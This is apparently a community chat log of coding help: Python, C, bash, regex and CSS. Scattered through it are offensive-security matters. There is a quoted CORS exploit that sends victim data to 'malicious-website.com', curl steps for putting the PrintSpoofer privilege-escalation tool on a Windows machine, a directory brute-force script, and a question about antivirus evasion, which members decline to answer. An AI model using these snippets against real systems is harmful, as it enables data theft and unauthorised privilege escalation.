if you need to modify state then you'll have to look into mutexes or semaphores, and those are a pain in the arse

https://docs.python.org/3/library/concurrent.futures.html here's the doc

Do any of you have a python profiler you really like?

I just use the standard one - https://docs.python.org/3/library/profile.html

For most analysis, i use cProfile. I think I've only used profile once, and it was significantly slower

cool, thanks. I haven't worked with it before but can look into it

i made something with multiprocessing and logging, nothing too fancy

#!/usr/bin/env/python3
import multiprocessing,requests,logging,time,queue
from multiprocessing import Pool,Process
class Request(object):
    def __init__(self,url):
        self.url = url
    def main(self):
        arr = []
        global wordl 
        wordl = open('/usr/share/wordlists/dirb/common.txt','r')
        readw  = wordl.readlines()
        for i in readw:
            r = requests.get(self.url + '/' + i)
            global positive_req 
            positive_req = r.status_code == 200 or r.status_code < 400
            arr.append(positive_req)
            if r.status_code == 200 or r.status_code < 400:
                print(f'[{r.status_code}]Request->{self.url}/{i}')
            else:
                print(f'[{r.status_code}]Request->{self.url}/{i}')
    def output(self):
     openwl = open('/usr/share/wordlists/dirb/common.txt','r')
     print('Saving positive response to a txt file(If any).')
     readwl = openwl.readlines()
     for i in readwl:
         r2 = requests.get(self.url + '/' + i)
         positive = r2.status_code == 200
         with open('dirs.txt','w') as saved_file:
          for i in readwl:
           if r2.status_code == 200:
             saved_file.write('/' + str(i)) 
          else:
              pass
if __name__ == '__main__':
    Req = Request('https://google.com')
    process = Process(target=Req.main)
    process_output = Process(target=Req.output)
    q = queue.Queue()
    t = time.time()
    try:
        logging.basicConfig(format='%(asctime)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S')
        logging.warning('Request started.')
        for i in range(10):
            process.start()
            process.join()
            process_output.start()
            process_output.join()
            print("Done in: {}".format(time.time()-t) + 's')
    except Exception:
        logging.error('Status Finished.')
                                          

help i am trying to code a cooler command prompt and it wont open it just immediatly crashes

@echo off
chcp 65001 >nul
cls
:top
color 2
title Cool Command prompt
echo Welcome to the Cooler Command Prompt
echo Type 'Help' For Commands!
color 7
echo Microsoft Widnows [Version 10.0.19042.985]
echo (c) Microsoft Corportation. All rights reserved.
echo.
echo C:\WINDOWS\system32>
set /p main=C:\WINDOWS\system32>

if %main% == help goto help

:help
echo Commands

pls help

i dont know whats wrong it in batch btw

is it possible to make a python program that runs as a background process: so to elaborate how can i make program, that when clicked, doesnt show it is running but once you open task manager, you see the program running?

Given your previous comments, I am considering asking you to ask elsewhere.

I want capture username and password to store in file auth.log that trying to ssh into my server
My system is ubuntu 20.4. I even refered to this link - https://hackernoon.com/how-ive-captured-all-passwords-trying-to-ssh-into-my-server-d26a2a6263ec

I even refer the above link and installed ssh but it did not work I was not able to ssh in to my system. As ubuntu come with pre installed openssh . I removed it by using this command sudo apt-get remove --purge openssh-client and this command also sudo apt-get remove --purge openssh-server and again tried installing using portable openssh but it gave the error ssh.service not find. Can anyone help me with this

It sounds like you want to "daemonize" the process: https://en.wikipedia.org/wiki/Daemon_(computing) I suggest you research on "how to create a daemon process in Python" - it really depends if you want to do this under Unix or Windows, whether you want to use a library etc.

meetov doesnt making the file extension .pyw make it work?

@restive fossil I haven't done this since I have used Python mostly under Linux, but it seems to do the trick under Windows 🙂 A daemon might be too complicated for your case 🙂

free resource learn blackhat python ?

Message #programming

?

is anybody familiar with python websockets?

I think you should just ask

Someone will help

this might help you https://pypi.org/project/websockets/

could someone please help me and explain a how an sqli scanner I found actually works? the program is only 100 lines long but I can't understand it very well and it would really help if someone could explain it for me as I need to be able to recreate for a project I'm working on. Thank you for any help

Or just how to generate and detect sqlis in python would be great 😅

can anyone recommend a good resource for learning powershell?

@fathom bramble I havent personally read these, but it was shared in #resources along time ago, so its worth a try:
https://docs.microsoft.com/en-us/powershell/scripting/learn/more-powershell-learning?view=powershell-7
https://powershellexplained.com/

thank brother

Gave +1 Rep to @vernal vigil

thanks!

Gave +1 Rep to @glass cape

i need to do the following

1. Write a command (pipeline) that would summarize the number of daily logins of each user.
2. Use the above to write a script, which would report that numbers -- only the nonzero ones -- to a log file.
3. Prepare a crontab entry so that the script would be run once a day.
   this is the first script

for the second task i need to check if the last password change happened more than 90 days ago and if so require the user to change the password

this is unix bash

btw

sorry, got rerouted from general

what have you tried till now

learning unix

start with this

1. Write a command (pipeline) that would summarize the number of daily logins of each user.
   there are some log files you can use for this purpose

do you want that some one should right a code for you ??

no, i just dont know what to look for

but yeah of course i would want to do nothing who wouldnt, but that's not what im asking

my initial idea was to make a crontab that would create a file if it doesnt exist and log the login

but if the file already exists there is no need to do so

which file is it tho

somethere in the /etc id guess

nope - linux provides a load of log files you can use here - i'd probably use /var/log/auth.log - now I leave up to you how you should parse that

you can read the log file with paged output with less -S, skim around the file and look for what a successful login looks like, then you'll need to parse the date and make sure its from today

so i need to look data parsing for linux

you shouldn't need anything more than cut, tr, awk, and grep - all of which are native linux tools

btw man, my bash tells me there is no such file or directory

yeah ik grep

there was a command i found online

hol on

grep LOGIN /var/log/messages |grep username | wc -l

i've never seen or heard of the messages log - that might be a 3rd party application

but this doesnt use the dir you sent

this is the thing for me

sudo find / -type f -name "auth.log" 2>/dev/null

try that

messages contains system messages that aren't critical, aren't debug, and are general

Where the auth logs are stored also varies a bit from distro to distro. Ie, Ubuntu stores those logs in a different file than in CentOS

ah okay gotcha - I just found this bit
makes sense as Im usually on ubuntu

Yep

well if you do have the messages log try using that!

This also easily an easily searched for problem 🙂

lol it doesnt exist either

What distro are you using?

how do i check?

bash --version

?

What distro of linux

im not using linux as an os

im using ubuntu terminal

So you are using Ubuntu as a terminal. But you aren't using Ubuntu as an OS?

are you using Windows Subsystem for Linux?

with a linux stuff for windows

yes

subsystem

wsl yea

ah

is it shit?

Oh, then I can't help you. WSL and WSL2 always break for me, so I don't touch them.

wont say that

i just cant connect to a remote host because the server is down

ssh is not working

wsl is sometimes good

when am too lazy to boot vms

well you'd need to be parsing Windows logs in this case - I would install Sysmon - create a powershell script to parse that - use Windows Task Scheduler to schedule execution of the powershell script

networking in WSL is also broken - if you are on WSL2, I would expect SSH to work, but not with WSL1

thing is i used putty for connecting to remote host

which works fine

but it doesnt work anymore

i changed ports

but still

this honestly sounds like pain in the ass

but i guess if i got nothing else to do

its pretty easy tbh, if you like python they also have a library for parsing EVTX

i dont

lmao

more things to learn 😄

maybe in the future

but now i need to do this unix shit

alright are there some free hosts

servers

that run unix

do you not have the resources to run a virtual machine?

resources as in time or computational power

or the very will to do so

depends on all three

all of the above

well

id say yes

which vm should i install

big fan of ubuntu LTS but Mint or PopOs are good choices

price list?

either way, just choose one, live in it and stick with it

i need the one that's a bit

free

free forever!

good

dude are you available for a call im with my friend and he keeps asking me

or maybe create a groupchat

if your're fine with that

im just tired of decrypting everything yousay to him

unfortunately not right now - if you have questions ask them here for the benefit of everyone else 🙂

aight man either way, thank a lot for your input

or woman

or maybe someone else

we're inclusive

just using gender neutral terms is always a good rule of thumb - and np feel free to ping if you have further questions

have a blessed whatever the sun's position in degrees is relative to you

ubuntu lts weighs over 2gigs and with my internet speed ill need at least 3 hours to download it

guys

any other suggestions?

let is download at night

i need to finish it asap

no deadline i just have shit to do tomorrow

but i guess there is nothing else to be done?

any other variants?

i can do it next week tho

Any linux iso is going to be at least 3GB to download - anything smaller than that will be a netinstaller version, and it sounds like that is going to also not work for you.

😔

Lbuntu

Maybe

Or Arch..?

those are?

VMs?

You can install them on a vm

Just like ubuntu.

Can anyone suggest how to modify ssh service so that it can store password in Auth.log file in Ubuntu system.

That violates every security best practice I can think of. Why are you trying to modify the service?

To implement ssh honeypot

I was trying in this link https://hackernoon.com/how-ive-captured-all-passwords-trying-to-ssh-into-my-server-d26a2a6263ec

But it was not working

Can someone tell me why this function returns undefined function checkCreds(username,password){ fs.readFile(`U_Conf/${username}/creds.txt`, (err,data)=>{ let creds = JSON.parse(data); if(username in creds && password === creds[username]){ console.log('Connection Success'); return true; } else{ return false; } }); }

Because you’re not returning the result of fs.readFile

The return clauses in the arrow function are not in the top-level function, so the top level returns undefined

Looks like readFile doesn’t return anything. So you’ll need to handle the values some other way than by trying to return them from the callback

Can someone please help me?
I'm learning Java I am not able to understand what

Date now = new Date();

does

found it

I would use Cowrie or something similar.

It creates a new Date object and assigns the reference to an identifier called now. This is rather basic Java.

From the documentation for that constructor:

Allocates a Date object and initializes it so that it represents the time at which it was allocated, measured to the nearest millisecond.

hello lads

here i go again with unix

i need a file location that would help me get info on password changes

i need to write a command that would check if last change of password occured > 90 days ago

okay nevermind i found the chage

yes I am trying to look that

hi anyone here good with shell scripting ?

What's your question?

Hey does any body know how to create a js script that stores the user input and create a box with all of that information?

ehhhh, node with db

Has anyone completed freecodeadey and https://www.freecodecamp.org/learn/coding-interview-prep/ ? What do you this?

Brent, can you reword your question? I'm not exactly sure what you're asking.

@magic falcon I think, he may be trying to ask "Why do you do this?" or "What is there to do in this course?"

Always best not to presume 😉

if i have an executable that runs shellcode that is basically a meterpreter, if the user has antivirus software, what could i add to the executable to give it more power.

More power? @digital dove

Good luck evading AV with a meterpreter lol

what do you suggest else

What are you attacking?

windows machine

What Windows machine?

its a personal project im not going after any ctf rn, I wanted to learn about how stuff like that worked

i didnt really know about anything else then meterpreters so thats cool

I know a bit about writing malware, but I probably shouldn't go into that

well i'd love to learn

only thing i know how to do for now is running shellcode with a c++ program nothing crazy

Ok. We don't discuss that here.

If you reach 0xD, get a relevant pentest cert like eCPPT or OSCP, or complete throwback, then there's a channel for it

awwwww

I'm sure you understand why

yeah ik

Consider that motivation to be more active here 🙂

yeah true

well i'll take the fact that theres more than just meterpreter as a hint

There are some interesting books that talk about concepts of some big hacks, but not really technical details. That might be an interesting read for you while you're building up skill and points here

will do

There's also a malware analysis path/module here, but I haven't done it myself yet

ill look at alternatives to meterpreter to find a better/ more powerful one, rn im thinking of maybe modifying the program to do some stuff like maybe changing some or adding stuff

idk

noted.

Meterpreter is pretty blooming powerful

The only thing you'll get better than that are C2 launchers. Have a look into PS Empire and Covenant for the big, free ones. Cobalt Strike is objectively better, but costs an absolute fortune

There are hundreds more of them too, of varying degrees of effectiveness

Have a look into Wreath for more info

I'm pretty sure they're just trying to evade AV

awesome, thanks so much for the tips

Gave +1 Rep to @tulip sail

I already have everything setup and it works all I'm missing is a way to actually use the meterpreter without av catching on

Yes.

That's AV evasion.

yeah

do you think a c2 launcher would help with evading considering from what i see the payloads are more advanced than metasploits'

Please refer to this earlier message

oh right

Not directly, but they're easy to edit yourself 🤷‍♂️
Also, yeah ^^

Thank you again

AV evasion is quite an advanced topic.

i see

It's also a huge pain in the ass

it sounds fun so im up for the challenge

Get to 0xD and then you can discuss it in the specific channels here 😉

how can i speedrun it

Do like, Advent of Cyber

alright

advent of cyber hurts

Not really

any css frameworks that have components sort of like this?

both the navbar styling and those filter type buttons

If u are using vue or react chakra ui could help you

Choc ui and chakra templates has a lot of good navbars/buttons

Breadcrumbs? And ul with flexbox maybe, not sure bootstrap can do that,

oooh that looks great !! that would be what i need except for that fact i’m using vanilla js :((

you can always switch to React 😄

anyways you could prob find good stuff on bootstrap, though not my favorite styles

css frameworks are becoming big, like tailwind now has headless ui which is so good

nah making vulnerable stuffs hehe

but i will deffo be using that in my react projects

i just stole some free bulma template hehe

can someone spoonfeed me the code for wgetting printspoofer in python? (windows btw)

cant get it working

Do you want a compiled copy or learn how to compile it yourself?

Or are you looking to get it onto a machine?

getting it onto a machine

compiled

cant wget it from github ¯_(ツ)_/¯

You would have to download it, compile it and then transfer it across

If you're using a simple python script to get it across, you would use something like

i dont have to compile it look: https://github.com/RedTeamMedic/printspoofer/blob/main/PrintSpoofer.exe precompiled

Actually I'm not sure if this would work but:

import os
import sys

url = sys.argv[0]

os.system(f"curl {url} -o printspoofer.exe")

But you might as well just type curl url -o printspoofer.exe

Then again, I don't know if curling it onto a machine would work

i am so stupid

jabba thanks for saving the day once again

How can I create a similar tool like nmap, dirbuster, etc (but less functionality to begin with) using python?

Have you done some research into it first? Googling terms like "python port scanner" and "python web directory brute force"

Break down the problem. What will you need to do? Parse command line args? (search for how to do that) Loop/iterate through something? (more searching) Call a URL/open a port/etc? (more searching)

start with the big concepts, then break them down into smaller and smaller tasks until you get to a task that is small enough you can solve, and go from there

maybe start by hard-coding the program to scan a single IP, or a single port, or something like that.

Okay, I did some research. The thing is after creating a script using python, have to run like python3 <script_name.py> but I want like just run <scirptname> and that will run it. (just like any tool in linux command line)

Probably will do the arguments or flags after that

That bit of the program is probably the least important if you don't have the actual substance of the thing done

Focus on getting something usable before worrying about the QoL or the cosmetics imo

I mean, I just wanted to see if that is possible with python if not then will try to do the actual thing in different lang

https://docs.python.org/3.9/library/py_compile.html#module-py_compile

there are a few different ways to compile python. I haven't worked with any in a couple years, but they were all kindof a pain to work with

but I'll second what @stoic badger said- focus on getting it working, even just "proof of concept" style first, then you can look into distribution/packaging/etc.

another option, as a short-term fix, is to make an alias or a .sh file

so you can type "myCoolProgram -my arguments" and that is aliased to run "python ....." or some shell script.

agile development

I mean, this kind of applies with all workflows, but still

hey can someone explain this regex to me? q(?=[te][st])[co][de]

i am very confused

so this runs as admin btw, when i run it this is what shows up

but when i run that exact command in cmd with admin privs this is what shows up

sooo, since im running the py file as admin, shouldnt i get the exact result with both?

Hi guys. What language would you learn for malware development in Windows? C, C++ or C#?? Thanks

C#

For the pure reason of the Windows APIs

Which regex engine is that for?

really? i would've thought c was the best for malware since most malware makers use C as their preferred language

C++ FTW

anyone have any ideas about this ^^ ?

Again, Windows APIs.

Looks like windows isn't allowing your admin to impersonate the user account. Admin isn't always blanket permissions to do anything, check the file perms and group perms that the printspoofer is running under

but juun when i run printspoofer as admin in cmd i get nt authority normally, shouldn't that mean that running that file as admin should give me nt authority?

are you running it directly as the admin user, or as the regular user with elevated privs?

Caveat: I'm not super up to date on non-domain managed privs, so I could be sending you down a wrong path

Windows also does weird stuff with file and user contexts; i'm much more familiar with Linux contexts.

look heres the interesting thing: i go into cmd with normal privs, i dont have selimpersonate privs, however, i go into cmd as admin, i do, so when i run printspoofer as admin, it works.

That sounds like how it should be

oh

You may want to wait for a better windows mgmt SME to answer - that sounds like intended behavior to me

ight

I understand how RBAC should work, and that sounds like it's operating correctly. AD may be doing fucked up stuff

that is a positive lookahead, anything following ?= must be present in the pattern but aren't actually captured in the match
https://stackoverflow.com/questions/1570896/what-does-mean-in-a-regular-expression

ok im a beginner to c and i dont really understand void (void main())

what difference does it make to int main()

Depends on compiler. void indicates that no return is expected, in older compilers it was required that main() return an int to use as an error code.

oo ok

It's a simliar thing with main( int argc, char* argv) sometimes being omitted

i found this

The regex q(?=u)i can never match anything. It tries to match u and i at the same position. If there is a u immediately after the q then the lookahead succeeds but then i fails to match u. If there is anything other than a u immediately after the q then the lookahead fails.

so im confused as supposed to how that is matched

since it basically follows the patern in the text

Im not sure what your use case or example is - but I would just think of the lookahead as a conditional statement, i.e. "Match this string if it begins with x but do not capture x in the final output"

is & gt in C "greater than" and & lt is "lower than"?

Are you asking about a specific operator? & has a very specific meaning that doesn't match what your question is

ahh ok

so if u wanna see the full if statemenet: if (a & gt; b)

can you post the full snippet?

ok

That's not the full snippet. Where are the variables being defined?

Where are you getting this code from?

ok, what's happening is wherever you are getting this from is screwing up the code

> looks like it's some kind of code formatting to display the >= operator

or rather just >

same thing with the & bits

yea i guessed so, dont know why w3schools making things more complicated (╯°□°）╯︵ ┻━┻

post the link please

nm, found it

You'll commonly see stuff like this when the web server is doing replacement of characters and messes it up. &gt and &amp are the proper symbol codes for HTML; however, their rendering engine is breaking the symbol code up into multiple words.

oooooo got it

yeah

HTML entity, if you want the key word.

Hi

more regex question (?1) this recurses a subpatern / calls a numbered group, question is what are either of those? google didnt help too much

#include <stdlib.h>

int main()
{
    int a,b,c;
    printf("Please Enter Two Numbers \n");
    scanf("%d %d", &a, &b);
    c = a + b;
    printf("The result of the addition of both the numbers is %d \n", c);
    if(c != 11)
    {
        printf("please kill me");
    }
    while (100 > c)
    {
        printf("%d \n", c);
        c++;
        switch(c)
        {
        case 50:
            
        case
        }
    }

    return 0;
}```

heres the code

C btw

so in the case 50, i want to make it not print 50

how do i dat

your print statement would need to move, or you'd need to surround it with an if block

hey guys do you have any python library learning suggestions in order to increase my ethical hacking knowledge

while(100 > c) {
    if(c == 50) {
        c++;
        continue;
    }
    printf("%d\n",  c);
    c++;
}

yeah i was actually wondering if continue would do the trick

thx man

+rep @heavy rampart

Gave +1 Rep to @heavy rampart

you should increment at the end of a while block. does C even have a switch statement?

apparently it does, TIL...

ARG FRACK JAVA! bloody dependency pulling a java 11 lib instead of java 8

y does it say the address of *pntr in 14??? shouldn't it be 61fe14?

You're derefing pntr in the second printf the second argument for that printf call should just be pntr and not *pntr

oh cool, y does it have to be pntr only?

With pointer types the * means to dereference the pointer and access the value so just putting pntr without the * means don't deref and print the actual value of the pointer

ohhhhhhhh

got it

damn

+rep @hollow tangle

Gave +1 Rep to @hollow tangle

there we go

{
  FILE * fileName;
  char ch;
  fileName = fopen("anything.txt","wt");
  for (ch = 'D' ; ch <= 'S' ; ch++) {
    putc (ch , fileName);
    }
  fclose (fileName);
  return 0;
}```

wat is going on here

main thing i dont get is the ch <= 's'

how can a character be larger than another character

Characters are a set that is well-ordered.

The text character is represented by a symbol, what is the underlying representation in memory?

Hello, is there a C programmer ready to help me ? 🙂

What's up? Feel free to drop your question here

Isn't it just ascii vals? I haven't touched C in a while

🙂

pretty much, a char in C is basically a number (from -127 to 127 if signed, 0 to 255 if unsigned)

var req = new XMLHttpRequest(); //makes a xmlhttp object

req.open('get','https://vulnerable-website.com/sensitive-victim-data',true); //making request to server

req.withCredentials = true; // for CORS

req.send(); // sending request

req.onload = function() {
location='//malicious-website.com/log?key='+this.responseText;
}
what is purpose of last line ? pls can anyone explain

does anyone know anything about this "Using EoL Python Versions on Kali" i m getting errors

It gets the API key as a response in the new xmlhttp object and displays in malicious-website.com/log on load of the request

I stand to be corrected 😊

@rancid sigil Ok understood

when attacker checks logs on his sever he gets the api key's of users who visited

his site and from there visited the vulnerable website

am i correct ??

is there anyway to prioritise addition over multiplication?

without adding paranthesis

or is there a way to automatically add paranthesis for two values with a '+' b/w them

Nope. Not unless you overload the operator, which could get you tarred and feathered by the other people on the team.

overload? 😅

perhaps https://en.wikipedia.org/wiki/Reverse_Polish_notation might be useful for you too

what language are you using?

python mostly

just add the ( ) and call it a day 🙂

Reverse polish notation - but you will more than likely have to either build a custom parser or else write a bunch of functions or operator overloads to make it work.

ninja'd 😦

By 11 minutes 😉

i wasn't scrolling

i was reading top-down, like a good programmer who reads docs 🙂

what are docs? 🤔 😕

oh, that's the part that the unicorn team is supposed to do. Yeah, that's still backlogged

tried and failed to find a clip from Volcano of Don Cheadle saying "you gotta be fast".

https://tenor.com/view/minivan-car-van-smoking-burning-gif-4633245

That looks like something from hoonigan

https://tenor.com/view/smart-car-fast-racing-funny-gif-13670789

I've ridden in a smartcar. I'd be terrified to be in one that did that

You ride racing motorcycles, how is a smart car outfitted with a hayabusa engine more scary

That's precisely the right question 🙂

at least on a bike if it wrecks, I have my airbag suit and can slide. In that smartcar, it'd crush like a soda can. And once those front wheels lift, you have virtually no control over anything. On a bike, you have lots of control over braking/steering/lean/etc.

you can't tell me it wouldn't be a blast to go full gymkata in that hyped smart car though

gimme a roll cage and a 5 point harness and a neck brace, and I'd do it

trust me, being in a vehicle that rolls, without a cage, without a helmet, without gear, that aint no fun. Especially when there are heavy and sharp things bouncing/flying around too

I always thought driving a reliant could be fun

that 3-wheel thing? that's gotta be massively unstable

heyo, anyone here who's dabbled in bash a fair bit?

I've got a script, that backgrounds a process, and I'm trying to detach the child process from the parent one - so that killing the child won't also end the parent, but disown -a doesn't seem to do it for me

I can provide screenshots etc. if I didn't explain the issue clearly enough

disown seems to work absolutely fine testing in my bash terminal, but when it comes to a script executing it, no luck

@dire vortex have you tried using nohup? Not too familiar with detaching from parent processes but that in theory should work?

Or setsid for creating process in other session, not really sure what @dire vortex trying to do.

I played around with nohup for a little while, with no luck it seemed